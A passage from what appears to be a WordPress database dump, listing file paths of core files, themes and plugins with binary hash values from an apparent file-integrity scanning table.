����','wp-content/themes/clean-magazine/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=[�ql�oGpN6�1b','^3���]O�F�I\Zs��7�:�����jŦ','',0,'?'),('���[�/�9}�`:w�P','license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Lil+z9q9=\0�{�\r','���.�7h���-Zs%|��Cp)��¯v���','',0,'?'),('��Z$8�@�q��o5�9�','wp-content/plugins/unyson/framework/includes/option-types/addable-option/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�o}��4��~','.\Z��O���W�����M���,+�\Z��4','',0,'?'),('�ܩ_\n4�.���j','wp-content/themes/sg-window/genericons/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�R�����}YM(','��;�Ji2�4�{3��.��(^�Z}řۉ*E','',0,'?'),('�����-��1��','wp-content/plugins/wordpress-seo/js/dist/wp-seo-metabox-350.min.js',0,'�S��T\n4&��y�a','�S��T\n4&��y�a','t\Z�u�T�\Z�P�<Ѯ&�ܲ\'�׽葮','',0,'?'),('��W��/��:���g�','wp-content/themes/point/functions/widget-ad125.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dޅ�~k���Eq\'	�','�vGj�]1�3Ȧp�Mih������2n_�8�z','',0,'?'),('�\0�����.}�fwA','wp-includes/date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n[*(Ҿ�w.m�y�z�','�.��\0�qB_]������\0��a�}��\0�','',0,'?'),('���t�Ds��b��V','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ip.arin.php',0,'8�r@���Xf��g�Px','8�r@���Xf��g�Px','�Ծ{R���5�	h����U�\"!S]��','',0,'?'),('�E�ʷ��Ll�y','wp-content/plugins/unyson/framework/core/components/extensions/manager/available-extensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	ZC��95V��A�މu','��=s�卶���h8�P��Ϋ^�\rr��-Ђ','',0,'?'),('�^��;X�)ڤ6)','wp-content/themes/sg-window/img/icons/google.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�c�h�R#?��9-','[�ayǟ(�,@z�5��z���Abr�t�̣�G�y','',0,'?'),('�K�iEurK��ږM�','wp-content/themes/twentyseventeen/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�HC��Kx\r�70V��','��ҍ||��ò+�W����$U�V�{�r�','',0,'?'),('��06�R��)�7gq�\0','wp-content/themes/travelify/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��7�3���c�PR','�8�ϯ�p��jH$ӣֵ��\'y�QG�Y�E','',0,'?'),('����f((��`�۰�','wp-content/plugins/dw-social-share/assets/img/style-6.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��T�br��\\^��','^V!T�We�����#%�m\"���ߩ��r�cϵ','',0,'?'),('�$ɀ���C�j_b','wp-content/plugins/spam-captcha/core/lang/SL_framework-in_ID.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Uѷv)�Q���','�k��Se�1�-_�V\"��<XI�4�f��0P��','',0,'?'),('�$�[gJ��ϭ���Gx','wp-content/themes/sg-window/img/icons/small/ask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�_�3\0��!�g>/�e','϶�ml�Xd�~E�Z<�Z�0�\r��G�cwil','',0,'?'),('�.���FC�p���3��','wp-content/plugins/wordfence/js/wfdropdown.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����rp��c\'\Z�','��SG��s8;�Z�!�זJ�u�1�z?���','',0,'?'),('�7��0rU~-p���M','wp-content/themes/aqueduct/img/gridpostsmall.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L�70�ZM���','U�)1\Z�u[�~�LX��;V����c9�x�oa','',0,'?'),('�Hmk��~1e\"7�NU','wp-content/plugins/wordpress-seo/admin/views/partial-alerts-warnings.php',0,'�F\"H�.�[�����Kd�','�F\"H�.�[�����Kd�','��*d7C���pe���r˪�V�\r����.','',0,'?'),('�O��:������u_Op','wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-plugin-license-manager.php',0,'`N2	������_','`N2	������_','yV(���Z:�Aw���r����q<ft�-�a','',0,'?'),('�P0k����WZ��K�','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`t��z���S�','9�K�N��e�@*R�8��}iؒb���\n�i\n','',0,'?'),('�[���QH\"pS1Ȫ�c','wp-admin/images/arrows-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� Q�}��ydb#6�','�,c�˿\Z�i(~���)����\'��8[A�/�I��x','',0,'?'),('�i_���~�\\, ','wp-content/themes/panoramic/library/fonts/font-awesome/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#s>+��Wɾ�ͺ�','��ӜG�n�,�jA�J/A�6L��2\Zǻ�;���','',0,'?'),('�k���\'�#F�HNs��','wp-content/themes/clean-magazine/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':rTL1��Z��N��','w=��87��Ja�����\\О��B]P�e�&','',0,'?'),('�w�\r�,����Ik�ú','wp-content/themes/fabulous-fluid/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������&a��','���\r[��6S[��_��w�К3R��uK%�H','',0,'?'),('�yϸ9�d�f����','wp-content/themes/wen-business/third-party/font-awesome/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�7#�,o��=ia�-q�','^ù�i8�C}nʎ5ģ@pdD����L�L�:�8','',0,'?'),('���\r�����S�b0�','wp-content/themes/supernews/acmethemes/customizer/header-options/header-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ٶf��\r2�W~','\rM�`\"�ˁOےס0\r���J\0�w�Fg\rZ�#','',0,'?'),('��������*��+7','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_progress-bar.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ck��bck��7<�','|�bT;��ՙJ�b��J����E�(W��F��','',0,'?'),('��[ixT�q��~Wv�e','wp-admin/network/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�JY��Fq�^��N�','z��w�iL�_�*�	!$c��L*�T�qDN_','',0,'?'),('���=w�M�f����&�','wp-content/themes/tortuga/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���xOk�]�TY����','��{�Otn�!��<��Ba��\'v$�bX/5��','',0,'?'),('��F~���y�c7v-','wp-includes/js/customize-preview-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�m�	i13-����','��%N�q�4��6�\n$^o����Ĝ7k��.�','',0,'?'),('��w� �O��Z%�>T','wp-content/themes/illdy/inc/customizer/panels/counter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p`*�~�|���E�P�','BdMN�%�Yw��?l�d_l�R�ˊm.�\nĩ��>','',0,'?'),('���=�ŭ}������','wp-content/themes/hueman/assets/front/js/ie/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��Ґ���\"����M','��P�\r���U9F�p����� <�n��N�','',0,'?'),('��;<�]��*nKi���','wp-content/themes/fabulous-fluid/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�H���{�','�}!�+�4h�r�\\$��	z;��S+�,8]M˟','',0,'?'),('��f��A��&B��','wp-content/themes/supernews/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʍ�l�J�:���?��','�h#:��	\\�8-�1�<�L���SJfd]��b','',0,'?'),('�̬�:�45*���E�','wp-content/themes/travelify/languages/it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H.�@Ζ\\������','S.�a�F�\\�mY�\"x�t-��gz�iŧ:��s�','',0,'?'),('��H��_X�Ѕ�gU','wp-content/themes/twentytwentyone/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iD8�\\q�GҴ�5�','A\Z3�9b��8��.�����>=坼xؠ	�','',0,'?'),('�ٓ�3�I|qg��,�','wp-content/plugins/wordpress-seo/css/index.php',0,'EЛ��O0��c���Ag3','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('��دj�oNS�e���\'L','wp-content/themes/clean-magazine/js/fitvids.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�͑Y�Dgؖ\\~��','����#$J��Dn�\Zh �����!�ܗ�	z�','',0,'?'),('��L.��K\"�i�W{4','wp-content/themes/relia/sidebar-shop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]R3�l�yI�6�\'','�Y�5+�̈l�=$l߹�yz���gR�9�mf�|','',0,'?'),('�䑖�w�7:\'�h*','wp-includes/js/dist/vendor/lodash.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2n�B2���]�� �','\"��Qe��\\NJhb�Bj�{i�J\n�Қi;eZ�3','',0,'?'),('��G�Gn���I�+R?','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hi.js',0,'��o�J���_P�]��','��o�J���_P�]��','�TL���p�W�WѸ�ߜ ڢR�\0�C�1','',0,'?'),('��^3���Cܔ?�$(','wp-content/themes/supernews/acmethemes/hooks/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�Lf��p�*2_��6','s����7��7N<c$��⏨������<�','',0,'?'),('���BJ*�f��i^\0�','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc-service.php',0,'��T:X�v�K\'���','��T:X�v�K\'���','��#����r�v�#��4��k�]lVwO','',0,'?'),('������]��+St�','wp-content/themes/sg-window/content-jetpack-portfolio-archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hN��	���{��1ӌk','�\Z��1M�����td=.5��o��Y,\")j���','',0,'?'),('��W�Л�~L+c���','wp-content/plugins/all-in-one-wp-migration/lib/view/main/missing-role-capability-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�RSP1JjUؙ,S)+','�p�ۤ\Z����̑v��o�Y�סf*�r}\0','',0,'?'),('���2���:�����','wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b4�\'��&��','ۼ�4P\'���hN�a�>���E�5ఛ','',0,'?'),('�2s�X+CZJ�L�,','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/taxonomies.php',0,'.������!R�� ĝ','.������!R�� ĝ','���,\Zk���E����i�W^�)�I�e�СYv�','',0,'?'),('��T���w����4�|R','wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��퍴4}�ҙ�\'��ts','��@�{���0����-��%\r�\\*t-���','',0,'?'),('�\Z-��x7�(A�4���','wp-includes/js/swfupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�`�^�-�o�QWz','��:)��6�a\"3r��\rP\rN�4�yJ�ַ��U�q','',0,'?'),('�P ����@\'�A)�','wp-content/themes/hueman/assets/admin/img/layout-off.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)����=~���p','���I�0�ݸ����x�#J �Xh�Bx�����','',0,'?'),('�i��7����S��','wp-content/themes/square/inc/woo-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�8G\0�2\r-��','\0Z6�|��J���Ҋx`��	�����VK\'J�','',0,'?'),('�\"U�;��V�7%�%�','wp-content/themes/barletta/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	����n��� l','k��/Zm@]��Y�X\r��<jSb*MX�xi�u�S','',0,'?'),('�(��\"����?4U','wp-content/themes/twentytwenty/assets/css/editor-style-classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�mrU\0�N�����8m','p�#�eC�{�)b�Ū@�H(ʋ>�:Yؤk','',0,'?'),('�,:���3�չ�C@�~�','wp-content/plugins/wordfence/modules/login-security/classes/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�a�b�vr�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('�1W;c�����N�\"�u','wp-includes/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����p�5yN.��&','�Ό��!-�ʉ�^;�#��Ut�\n�W^���YG5','',0,'?'),('�A��mpD�R�;�W��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/row/includes/page-builder-row-item/class-page-builder-row-item.php',0,'9ݪAzNI�\n�����','9ݪAzNI�\n�����','�k�u�	��0��U�v.��4z٫cM�9�W�','',0,'?'),('�Eޝ�Q�x.�wN��','wp-content/themes/sg-window/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eQ3��.S��M�<;','E*�o�)���,=v˓COJV_��D���](��)','',0,'?'),('�J��B�GT�;,l��T','wp-includes/images/smilies/icon_exclaim.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\��>5�\0r���sg�','�L�ɵ�H��A(�xʓ2�EP%�	��#���#�5','',0,'?'),('�J�A����M�+��\n','wp-content/themes/travelify/languages/ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�t�_篘�Y&','L��s�5�t�I�< J���i��]Y��0��','',0,'?'),('�V�^�3��m6�._P','wp-includes/customize/class-wp-customize-background-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�@�t��j23��W','�4���0^+�u*�:ޓ4q[#��O��m�&�','',0,'?'),('����:{��oZ�))','wp-content/themes/accelerate/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����c�T�ؐ2�',';�p,\"@#�V�����|�̱	AMZ�^��','',0,'?'),('���OOIB�싟��','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_thumbnails.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^\n�y�jS�8�_�','�k��w�Bdx*��R�*O�)�o�q$�]�','',0,'?'),('��\0�p�/ő��3�','wp-content/themes/relia/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�\nVo�p����Т','���X�\0T��V\'�X��i���9r��a','',0,'?'),('���[yC���̰3tl�','wp-content/themes/illdy/inc/admin/welcome-screen/js/welcome.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pa���Qc��uJ�(ɋ','�ALCq2U��z�|���>�F\\}�7�Z�(�U','',0,'?'),('�����[���D?_�[�','wp-includes/random_compat/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4������Տ��d�','�I�n��6��_����ga8��y��].��','',0,'?'),('����̱�ӠHɳ��','wp-content/themes/verbosa/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C��7�����ڋ8�','�A�(�\n*QÁo��\Z�P���L(�s!�','',0,'?'),('���7�M3š�$��','wp-includes/images/smilies/icon_question.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[-\0�\'��W��F','�7b��|6#����9/?x��~��[��%t','',0,'?'),('����\n�zb�g�\0���','wp-content/themes/hueman/assets/front/css/main.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M<\nׇR�XB','=��X�A&��ǓCQ�bܥDZ�\nU2i�ef','',0,'?'),('����2@�k�w>K�2','wp-includes/feed-atom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\r�g�\'SkI�fe�p�','!�I��m\nY��f+̕�P\0����13�\\=��','',0,'?'),('����H\0ۙ��h�C��','wp-admin/css/colors/ectoplasm/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_\0�2\r�T�j+��','0u�w0��x.X�_���)���!A��ěQ�b','',0,'?'),('��\0�${Y;�١$�R�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_responsive-visibility.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�כ�;���XL#��','7��IU��ŕ�>Ԏ�N4�o5\'6Η\\�.Y���','',0,'?'),('��wt�H���-s�\0�n','wp-includes/js/wplink.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U.a;g��J\'ڹ.r�','��ZE\\G.�Rb\'��\0��~$��p�l� �','',0,'?'),('����y�[��|8!ۏ�','wp-content/plugins/unyson/framework/static/libs/unycon/fonts/Unycon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��%�S�NJ�','��rw���q��u�DB�Dν43��H���','',0,'?'),('���LNJ�3��mKM�h','wp-content/plugins/wordpress-seo/frontend/index.php',0,'EЛ��O0��c���Ag3','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('��]����1w㞜','wp-content/themes/sg-window/genericons/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���鬓�/ؽ�&��','nq$�4�?9�Y|z��8!F��E���<�m>','',0,'?'),('���=֬H�@-i��','wp-includes/css/admin-bar-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','՞�J�.�\0k�.���','<I����3y�L1<�\'�z���2d�^F�;','',0,'?'),('���No$\'loq��v','wp-content/themes/hueman/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&~�m�[��U&��ʾ','��[fsO��y��y��O�s:z8u��I{','',0,'?'),('�˥��%�-�Ul1�','wp-content/themes/clean-magazine/js/jquery.cycle/jquery.cycle2.shuffle.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �m4�|�T>?�-l�','c�zic�btr�\\:7R�ɫ�,#���1�O-','',0,'?'),('��t,�C�J��Xp�','wp-content/plugins/spam-captcha/core/lang/SL_framework-es_MX.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�-S�<߿uW	��H�','��-����9Tx�2� ��7�:@$�m��','',0,'?'),('�����O�9\n�~�S|','wp-content/themes/sg-window/publication/template-parts/content-hero.php',0,'�-sǿ�fc���b��','�-sǿ�fc���b��','��E�,�\nfh\rR��\n��@��g�Ż����','',0,'?'),('�֔��ߚy(qD�w�','wp-content/plugins/wordfence/models/common/wfGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YJs@j���r�jtm','�3ÑѲs��\r&�z=���ds��pJx�3�w','',0,'?'),('��h�L���JH�X#0','wp-content/plugins/wordfence/lib/wfUnlockMsg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�c)��Re�Y�l�7��','.�`�i�W�	t1�}�sty�ɪ���!K','',0,'?'),('��d.�\Z���\n��\r','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/lt.js',0,'�/leKG�`51�#���','�/leKG�`51�#���','kI�u8Wk!st$�E���T��F0^~̨�%�\'','',0,'?'),('��)K�W&\'E��F%�','wp-content/plugins/contact-form-7/includes/l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z}�)���1ڒ���~','|����;SBpO�����RF둉�\"\r','',0,'?'),('����Kǥݳ�|u��','wp-content/themes/twentytwentyone/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�y�\0��X=�66DU','DD68s\\!g\Z01����=)�F,�2�\'$^Y','',0,'?'),('������ʼ�A5�\\�','wp-content/themes/fabulous-fluid/images/slider-img4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�n��Pg�KB=6	��','��zC�v�\\�J����~�TC�^榤�56','',0,'?'),('���^��\'�q���0��','wp-links-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ln��j�\\w�X=7I','7���\"1j��L?9Y�\"��&���kŌVD�|��','',0,'?'),('�?�½gw���4BF','wp-content/themes/travelify/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d˜��3���','��i�6��yLU�PȓL�?�;?9���tij\0�','',0,'?'),('�%n��Tߒ	^�gXΰ','wp-admin/js/inline-edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!nr�1�ir0��i�','t�Yܭ�ʖX��<x�c͹SJ���>R#�tVU','',0,'?'),('�-��m�����]h7','wp-content/themes/precious-lite/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mǽ�<A�k�R�','峋��?��ǯ���Fg8�(s��fr','',0,'?'),('�3��aD�w�P����q','wp-admin/includes/class-theme-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�>�RnN4��','�d`�E%���F�R��\Zˉ�s��!P�W�A�','',0,'?'),('�8?��@�4e����','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.wildwestdomains.php',0,'H*MX�}�]�d','H*MX�}�]�d','n�Ό��_��7�8���J4��#?^��Cw��','',0,'?'),('�9���b��؂�wOA�','wp-content/themes/fabulous-fluid/js/source/jquery.cycle/jquery.cycle2.tile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O�T�;\r�0�','$���]�P����t����&B�߳w#��ӄ�a��','',0,'?'),('�?�+Cc^iJ\"8','wp-content/themes/illdy/layout/js/count-to/count-to.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��Pr�(���J','�Q�.~���V\\&��<�RZ�F���Oԏ���','',0,'?'),('�G���M�.��','wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xY� i��F욤yG�','Z{���L��� �GNJ��\n�	����⪋��','',0,'?'),('�H_q}s\Z�j�\'�','wp-content/themes/relia/inc/customizer/panel-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����d���D�r�i#','�.@aΧ�_0^d��M�\n;BDHBi$�\"���`,G','',0,'?'),('�I�}�mx�5��V','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/team-member/views/view.php',0,'��fQ�D.C���p�','��fQ�D.C���p�','Zw�+���aƧ�X9��jA+7���\'�G�','',0,'?'),('�L(,�.����ZP/:�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.php',0,'z9գ��#����@�r��','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�UFIJ��	N�Y�l�','wp-content/themes/morfeu/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*h5����E!��k�\r�','�R�;�,���Zr�u�S{\\8#�b_?„��E�/�','',0,'?'),('�hȒs��!a�a#�O�','wp-content/themes/point/functions.php',0,'��%�m~ܵ�����','��%�m~ܵ�����','t�^|�\0TRQ��J�kG�m���J/�j�@','',0,'?'),('���>�E/RUM\'ƺzq�','wp-content/themes/nirvana/frontpage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X���D_�','*�W�P3�&�k����q���|Z�x>ΧȽ\r','',0,'?'),('���h_��ܩ����','wp-content/themes/barletta/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N`a�/T�ø���D','�	G����.\"&��Ԓ;�����J�o��','',0,'?'),('��n&���n�!崬�','wp-admin/css/site-icon.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�ˁx�J��TG���','�+���W���V��3�(qF���r;�|^�@��','',0,'?'),('����4/����77=!�','wp-content/themes/nirvana/images/icon-tooltip.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܞS;��L�����','1��1�7)(W�[ �a�Ԥ\ZY�N\n�\n��-�.湺','',0,'?'),('�����|\'���$q','wp-content/plugins/all-in-one-wp-migration/lib/view/common/share-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�׽>����׮\n3&','t�i��l�S���Ml��ʔک��5����','',0,'?'),('����EX���|T��','wp-includes/blocks/media-text/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��i������','�/�F��:�yƑ����d~��^\\\\�','',0,'?'),('���0��޷��pįtS','wp-content/plugins/unyson/framework/includes/option-types/rgba-color-picker/static/images/transparency-grid.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�!���K+�<�j+�=','E��F�LMMH��>�_Yp\ZU����47��+','',0,'?'),('��Vr^T2���X�O���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�B�	�?�{n��\Z','t�����p1��\ZQU�|O���\Z(0�\"tV[','',0,'?'),('��.�Bt��/o��Ë\Z','wp-content/themes/verbosa/cryout/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�¹E��(��(���k','w:H\'8�i���=�%�d��Y���o���^','',0,'?'),('���\ZKL*Q�qH8�','wp-content/themes/mh-magazine-lite/languages/fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L�;�;~gt����','���S�*-�E;�C&�~�/�I	�~�J��\r�_7','',0,'?'),('��]j�l�\'��/x5','wp-includes/js/wp-sanitize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('���W��{�\\,�Yu�','wp-includes/js/jquery/ui/effect-explode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���i!1��	�','s��e=\'���ڜ�N�I�{�U�!�M�E�s','',0,'?'),('��71���}\n��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�2+;�F���нNM��','�w��\"�*��5�U T@��nyȳ�^a�u��\'','',0,'?'),('���΃�܍hj].�|>','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.hy.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9}�r)�n!h��8','��L4z:��J@O$>V��f�BS��zA��b','',0,'?'),('�,�{�vF��ߝ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php',0,'z9գ��#����@�r��','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�2X69G3�\Z�+}A�6','wp-content/plugins/wordfence/views/waf/option-whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@7���#{X��q��','J���n�������Pq��/�\Z�n\n��l�V','',0,'?'),('�5����\r��k��','wp-admin/js/color-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�y���qE]c\rҥ','�h$��8ڤ)�!�p栈al�\\�rD�t�f��','',0,'?'),('�5�1���2襈�\"}r�','wp-content/themes/sg-window/publication/template-parts/content-author.php',0,'��xW[\r�ι��ͺ�6','��xW[\r�ι��ͺ�6','�;a��M�#�*`B�>�[Eo晍��*	�>','',0,'?'),('�8�������P5aĨ�	','wp-includes/images/smilies/icon_wink.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e?2���i����','�(���V��{�V�Bk����o(`Z��V	6','',0,'?'),('�;�����_k�yM','wp-content/themes/panoramic/library/fonts/font-awesome/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qI�6��Y0n�*���','j��v�Cm��:}I�`\r�	C��z� �Z�9hd�','',0,'?'),('�R�0���t���]��','wp-content/plugins/contact-form-7/includes/contact-form-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��\0���Ƿ2j&�','�	��%�s�U&Gʕ�g�sJ��Rrb�Y��nq?','',0,'?'),('�\\$g�:��&�\nG��(','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.mn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�K��b�}�)�',':7��I��Q3�=O�|�:Չেx�	���+','',0,'?'),('�t\0���\Z�Xs���7','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filesystem/class-ai1wm-file-htaccess.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=9�c�>���ʏ','a-\Z��#��o���T��@��	